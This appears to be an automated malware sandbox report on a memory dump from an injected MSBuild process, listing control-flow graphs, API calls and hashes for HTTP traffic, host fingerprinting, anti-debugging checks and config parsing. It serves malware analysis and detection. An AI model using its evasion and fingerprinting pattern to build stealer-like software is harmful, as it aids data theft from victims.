                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045C7
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                                • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                                • API String ID: 2127927946-2218711628
                                                • Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                • Instruction ID: ff82eb6acc97b20701c4bcbd3dbf8f3289274c2dbbe7f73b68b52ee208cac3fc
                                                • Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                • Instruction Fuzzy Hash: 1D419979740624EBC718AFE5FC8DB987F71AB4C712BA0C062F90296190C7B9D5119B3E

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 856 406280-40630b call 41a7a0 call 4047b0 call 41a740 InternetOpenA 864 406314-406318 856->864 865 40630d 856->865 866 406509-406525 call 41a7a0 call 41a800 * 2 864->866 867 40631e-406342 InternetConnectA 864->867 865->864 883 406528-40652d 866->883 869 406348-40634c 867->869 870 4064ff-406502 867->870 872 40635a 869->872 873 40634e-406358 869->873 870->866 875 406364-406392 HttpOpenRequestA 872->875 873->875 877 4064f5-4064f8 875->877 878 406398-40639c 875->878 877->870 880 4063c5-406405 HttpSendRequestA 878->880 881 40639e-4063be 878->881 885 406407-406427 call 41a740 call 41a800 * 2 880->885 886 40642c-40644b call 418940 880->886 881->880 885->883 892 4064c9-4064e9 call 41a740 call 41a800 * 2 886->892 893 40644d-406454 886->893 892->883 896 406456-406480 InternetReadFile 893->896 897 4064c7-4064ee 893->897 901 406482-406489 896->901 902 40648b 896->902 897->877 901->902 905 40648d-4064c5 call 41a9b0 call 41a8a0 call 41a800 901->905 902->897 905->896
                                                APIs
                                                  • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                  • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                  • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                  • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000,00420DFB), ref: 004062E1
                                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                                • HttpOpenRequestA.WININET(00000000,GET,?,?,00000000,00000000,00400100,00000000), ref: 00406385
                                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040646D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Internet$??2@$HttpOpenRequest$ConnectCrackFileReadSend
                                                • String ID: ERROR$ERROR$GET
                                                • API String ID: 1095854997-2509457195
                                                • Opcode ID: 460f558118b4083d41359c156125f26ce9f22fb94ebe107836e013dd45d71b95
                                                • Instruction ID: 4c22ad93782da972e928cd377ef6cc95e5ae9f8df18decad01f21c65d1bf8a87
                                                • Opcode Fuzzy Hash: 460f558118b4083d41359c156125f26ce9f22fb94ebe107836e013dd45d71b95
                                                • Instruction Fuzzy Hash: C1718075A00218ABDB24EFE0DC49BEE7775FB44700F10816AF50A6B1D0DBB86A85CF56
                                                APIs
                                                • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: NameUser
                                                • String ID:
                                                • API String ID: 2645101109-0
                                                • Opcode ID: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                                • Instruction ID: ff9f3fb77af2488786a742b30a7a77c7a6675fe12b7944dcc27658a291e6e945
                                                • Opcode Fuzzy Hash: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                                • Instruction Fuzzy Hash: 08F04FB5D44208AFC710DFD8DD49BAEBBB8EB05711F10025AFA05A2680C77815448BA2
                                                APIs
                                                • GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InfoSystem
                                                • String ID:
                                                • API String ID: 31276548-0
                                                • Opcode ID: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                                • Instruction ID: a8b5f4e8781596c88644d8aa2969b9d6e82c50da38cf1cac8898b5ca04c80d98
                                                • Opcode Fuzzy Hash: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                                • Instruction Fuzzy Hash: F4D05E7C94030CEBCB14EFE0D9496DDBB79FB0D311F001559ED0572340EA306481CAA6

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 725 419c10-419c1a 726 419c20-41a031 725->726 727 41a036-41a0ca LoadLibraryA * 8 725->727 726->727 728 41a146-41a14d 727->728 729 41a0cc-41a141 727->729 731 41a153-41a211 728->731 732 41a216-41a21d 728->732 729->728 731->732 733 41a298-41a29f 732->733 734 41a21f-41a293 732->734 736 41a2a5-41a332 733->736 737 41a337-41a33e 733->737 734->733 736->737 740 41a344-41a41a 737->740 741 41a41f-41a426 737->741 740->741 744 41a4a2-41a4a9 741->744 745 41a428-41a49d 741->745 750 41a4ab-41a4d7 744->750 751 41a4dc-41a4e3 744->751 745->744 750->751 754 41a515-41a51c 751->754 755 41a4e5-41a510 751->755 763 41a612-41a619 754->763 764 41a522-41a60d 754->764 755->754 766 41a61b-41a678 763->766 767 41a67d-41a684 763->767 764->763 766->767 778 41a686-41a699 767->778 779 41a69e-41a6a5 767->779 778->779 783 41a6a7-41a703 779->783 784 41a708-41a709 779->784 783->784
                                                APIs
                                                • LoadLibraryA.KERNELBASE(?,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A03D
                                                • LoadLibraryA.KERNELBASE(?,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A04E
                                                • LoadLibraryA.KERNELBASE(?,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A060
                                                • LoadLibraryA.KERNELBASE(?,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A072
                                                • LoadLibraryA.KERNELBASE(?,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A083
                                                • LoadLibraryA.KERNELBASE(?,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A095
                                                • LoadLibraryA.KERNELBASE(?,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0A7
                                                • LoadLibraryA.KERNELBASE(?,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0B8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID: HttpQueryInfoA$InternetSetOptionA
                                                • API String ID: 1029625771-1775429166
                                                • Opcode ID: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                                • Instruction ID: b148544ec257a615b167952e2e9b89b3667e8f5620887ecf26b211dda149ff7d
                                                • Opcode Fuzzy Hash: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                                • Instruction Fuzzy Hash: 02621DBD5C0200BFD364DFE8EE889A63BFBF74E701714A61AE609C3264D6399441DB52

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 915 404880-404942 call 41a7a0 call 4047b0 call 41a740 * 5 932 404944 915->932 933 40494b-40494f 915->933 932->933 934 404955-404acd call 418b60 call 41a920 call 41a8a0 call 41a800 * 2 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a920 call 41a8a0 call 41a800 * 2 933->934 935 404ecb-404ef3 call 41aad0 call 409ac0 933->935 934->935 1023 404ad3-404ad7 934->1023 948 404f32-404fa2 call 418990 * 2 call 41a7a0 call 41a800 * 8 935->948 949 404ef5-404f2d call 41a820 call 41a9b0 call 41a8a0 call 41a800 935->949 949->948 1024 404ae5 1023->1024 1025 404ad9-404ae3 1023->1025 1026 404aef-404b22 1024->1026 1025->1026 1028 404b28-404e28 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a740 call 41a920 * 2 call 41a8a0 call 41a800 * 2 call 41aad0 * 4 1026->1028 1029 404ebe-404ec4 1026->1029 1143 404e32-404e5c 1028->1143 1029->935 1145 404e67-404eb9 InternetCloseHandle call 41a800 1143->1145 1146 404e5e-404e65 1143->1146 1145->1029 1146->1145 1147 404e69-404ea7 call 41a9b0 call 41a8a0 call 41a800 1146->1147 1147->1143
                                                APIs
                                                  • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                  • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                  • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                  • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                • InternetCloseHandle.WININET(00000000), ref: 00404EAD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ??2@$Internet$CloseCrackHandle
                                                • String ID: "$"$------$------$------
                                                • API String ID: 3842476067-2180234286
                                                • Opcode ID: 8871a7e0db803886412357a9f8af80b172f418654194f3178fcef7dc839d38c6
                                                • Instruction ID: 3f466b8612cc2db17a5d9ea90efc92506b51061f54fe9a8e3d974c375c306076
                                                • Opcode Fuzzy Hash: 8871a7e0db803886412357a9f8af80b172f418654194f3178fcef7dc839d38c6
                                                • Instruction Fuzzy Hash: 10124EB1911118AADB14FB91DD92FEEB339AF14314F50419EB10672091DF382F9ACF6A

                                                Control-flow Graph

                                                APIs
                                                • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ??2@$CrackInternet
                                                • String ID: <
                                                • API String ID: 676793843-4251816714
                                                • Opcode ID: c386c9d0d73067ea41f4377aeaa2fd448281082c22fa9440fc98d6664c6993a8
                                                • Instruction ID: 59ffd934fb977a93d501bba2862ecb1df6a0defd032b503e5e890a78b3955a81
                                                • Opcode Fuzzy Hash: c386c9d0d73067ea41f4377aeaa2fd448281082c22fa9440fc98d6664c6993a8
                                                • Instruction Fuzzy Hash: 712149B5D00219ABDF10DFA5E849BDD7B74FF04320F008229F925A7290EB706A15CF95

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1384 419860-419874 call 419750 1387 419a93-419af2 LoadLibraryA * 3 1384->1387 1388 41987a-419a8e call 419780 1384->1388 1394 419af4-419b08 1387->1394 1395 419b0d-419b14 1387->1395 1388->1387 1394->1395 1396 419b46-419b4d 1395->1396 1397 419b16-419b41 1395->1397 1400 419b68-419b6f 1396->1400 1401 419b4f-419b63 1396->1401 1397->1396 1402 419b71-419b84 1400->1402 1403 419b89-419b90 1400->1403 1401->1400 1402->1403 1406 419bc1-419bc2 1403->1406 1407 419b92-419bbc 1403->1407 1407->1406
                                                APIs
                                                • LoadLibraryA.KERNELBASE(?,?,00416A00), ref: 00419A9A
                                                • LoadLibraryA.KERNELBASE(?,?,00416A00), ref: 00419AAB
                                                • LoadLibraryA.KERNELBASE(?,?,00416A00), ref: 00419ACF
                                                Strings
                                                • NtQueryInformationProcess, xrefs: 00419BAA
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID: NtQueryInformationProcess
                                                • API String ID: 1029625771-2781105232
                                                • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                • Instruction ID: 20ebc6b46c949eaa7f25e90fb8197bb2e58582eade08509f86bd82c1d7e4afd5
                                                • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                • Instruction Fuzzy Hash: 55A14DBD5C4240BFE354EFE8ED889963BFBF74E301704661AE605C3264D639A841DB12

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1431 4117a0-4117cd call 41aad0 1435 4117d7-4117f1 call 41aad0 strtok_s 1431->1435 1436 4117cf-4117d1 ExitProcess 1431->1436 1439 4117f4-4117f8 1435->1439 1440 4119c2-4119cd call 41a800 1439->1440 1441 4117fe-411811 1439->1441 1443 411817-41181a 1441->1443 1444 41199e-4119bd strtok_s 1441->1444 1446 411821-411830 call 41a820 1443->1446 1447 411849-411858 call 41a820 1443->1447 1448 4118ad-4118be 1443->1448 1449 4118cf-4118e0 1443->1449 1450 41198f-411999 call 41a820 1443->1450 1451 4118f1-411902 1443->1451 1452 411951-411962 1443->1452 1453 411970-411981 1443->1453 1454 411913-411924 1443->1454 1455 411932-411943 1443->1455 1456 411835-411844 call 41a820 1443->1456 1457 41185d-41186e 1443->1457 1458 41187f-411890 1443->1458 1444->1439 1446->1444 1447->1444 1491 4118c0-4118c3 1448->1491 1492 4118ca 1448->1492 1475 4118e2-4118e5 1449->1475 1476 4118ec 1449->1476 1450->1444 1477 411904-411907 1451->1477 1478 41190e 1451->1478 1485 411964-411967 1452->1485 1486 41196e 1452->1486 1489 411983-411986 1453->1489 1490 41198d 1453->1490 1479 411930 1454->1479 1480 411926-411929 1454->1480 1481 411945-411948 1455->1481 1482 41194f 1455->1482 1456->1444 1483 411870-411873 1457->1483 1484 41187a 1457->1484 1487 411892-41189c 1458->1487 1488 41189e-4118a1 1458->1488 1475->1476 1476->1444 1477->1478 1478->1444 1479->1444 1480->1479 1481->1482 1482->1444 1483->1484 1484->1444 1485->1486 1486->1444 1493 4118a8 1487->1493 1488->1493 1489->1490 1490->1444 1491->1492 1492->1444 1493->1444
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: strtok_s$ExitProcess
                                                • String ID: block
                                                • API String ID: 762877946-2199623458
                                                • Opcode ID: 04f02f922f7740013fe83ed2a8f854d15328f230cbde421a22dc870209397cee
                                                • Instruction ID: 00bb13bb87ecd4f31d5cbb7361e66ee12f2c4d363b15aa8138e6c51e0cba8311
                                                • Opcode Fuzzy Hash: 04f02f922f7740013fe83ed2a8f854d15328f230cbde421a22dc870209397cee
                                                • Instruction Fuzzy Hash: AC517DB4A10209EFCB04DFA1D954BFE77B6BF44304F10804AE516A7361D778E992CB6A

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1494 417500-41754a 1496 417553-4175c7 GetVolumeInformationA call 418d00 * 3 1494->1496 1497 41754c 1494->1497 1504 4175d8-4175df 1496->1504 1497->1496 1505 4175e1-4175fa call 418d00 1504->1505 1506 4175fc-417617 1504->1506 1505->1504 1512 417619-417626 call 41a740 1506->1512 1513 417628-417658 call 41a740 1506->1513 1517 41767e-41768e 1512->1517 1513->1517
                                                APIs
                                                • GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041757F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InformationVolume
                                                • String ID: :$C$\
                                                • API String ID: 2039140958-3809124531
                                                • Opcode ID: ed3ca360dd794ca93df171aa1d69aa55e8069c6d35c7c4129d84d5da30dc5272
                                                • Instruction ID: 2fa5a76c25c4840d12821100fc964cf287d391274576238511e757cc0c078ff1
                                                • Opcode Fuzzy Hash: ed3ca360dd794ca93df171aa1d69aa55e8069c6d35c7c4129d84d5da30dc5272
                                                • Instruction Fuzzy Hash: BF41A2B5D44248ABDB10DF94DC45BEEBBB9EF08714F10019DF50967280D778AA84CBA9

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1520 401220-401247 call 4189b0 GlobalMemoryStatusEx 1523 401273-40127a 1520->1523 1524 401249-401271 call 41da00 * 2 1520->1524 1526 401281-401285 1523->1526 1524->1526 1527 401287 1526->1527 1528 40129a-40129d 1526->1528 1530 401292 1527->1530 1531 401289-401290 1527->1531 1530->1528 1531->1528 1531->1530
                                                APIs
                                                • GlobalMemoryStatusEx.KERNELBASE(00000040,?,00000000,00000040), ref: 0040123E
                                                • __aulldiv.LIBCMT ref: 00401258
                                                • __aulldiv.LIBCMT ref: 00401266
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __aulldiv$GlobalMemoryStatus
                                                • String ID: @
                                                • API String ID: 2185283323-2766056989
                                                • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                • Instruction ID: f2ded3d157cb35307e0b39d430c96622be3dd75f8d5744ac0086d878f352425a
                                                • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                • Instruction Fuzzy Hash: 5901FBB0D84308BAEB10DBE4DC49B9EBB78AB15705F20809EE705B62D0D6785585879D

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 00401160: GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                                  • Part of subcall function 00401110: VirtualAllocExNuma.KERNELBASE(00000000,?,?,00416A1C), ref: 00401132
                                                  • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNELBASE(00000040,?,00000000,00000040), ref: 0040123E
                                                  • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
                                                  • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
                                                • GetUserDefaultLCID.KERNELBASE ref: 00416A26
                                                  • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                                  • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: NameUser__aulldiv$AllocComputerDefaultGlobalInfoMemoryNumaStatusSystemVirtual
                                                • String ID:
                                                • API String ID: 3178950686-0
                                                • Opcode ID: 89bd8792c9ea463fe5cd0678b04f38b1ba409c67d9b77676339e57910a337a73
                                                • Instruction ID: 00249ead6714b3af85de48d5768f0cff66b99727dd84f15ff7ce73ce32af2852
                                                • Opcode Fuzzy Hash: 89bd8792c9ea463fe5cd0678b04f38b1ba409c67d9b77676339e57910a337a73
                                                • Instruction Fuzzy Hash: 63316175940208AADB04FBF2DC56BEE7339AF04354F10452EF102A61D2DF7C6996C6AE
                                                APIs
                                                • GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ComputerName
                                                • String ID:
                                                • API String ID: 3545744682-0
                                                • Opcode ID: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                                • Instruction ID: 452d18c19ae851532a1d010ea63a4611fd0250a2e86211d30d2d96ca9096ca29
                                                • Opcode Fuzzy Hash: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                                • Instruction Fuzzy Hash: 220186F1A48204EFD700DF94DD45BAABBB8FB05B11F10425AF545E3280C37859448BA6
                                                APIs
                                                • VirtualAllocExNuma.KERNELBASE(00000000,?,?,00416A1C), ref: 00401132
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocNumaVirtual
                                                • String ID:
                                                • API String ID: 4233825816-0
                                                • Opcode ID: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                                • Instruction ID: 516f97497d3ee46bc55051264f2a31c9d8efacdbd59bd60d04d859dfb32d17c4
                                                • Opcode Fuzzy Hash: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                                • Instruction Fuzzy Hash: 76E08674985308FFE7106BE09C0AB0976B9EB05B05F101055F7087A1D0C6B826009699
                                                APIs
                                                • VirtualAlloc.KERNELBASE(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416A1C), ref: 004010B3
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                                • Instruction ID: e05e9ea69c75ff17789b13d2c0695db9e8f3777892ad192db41722de5b6306ee
                                                • Opcode Fuzzy Hash: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                                • Instruction Fuzzy Hash: F2F052B1681208BBE7109BA4AC49FABB3E8E305B14F301408F500E3380C5319E00CAA4
                                                APIs
                                                • IsDebuggerPresent.KERNEL32 ref: 0041BBA2
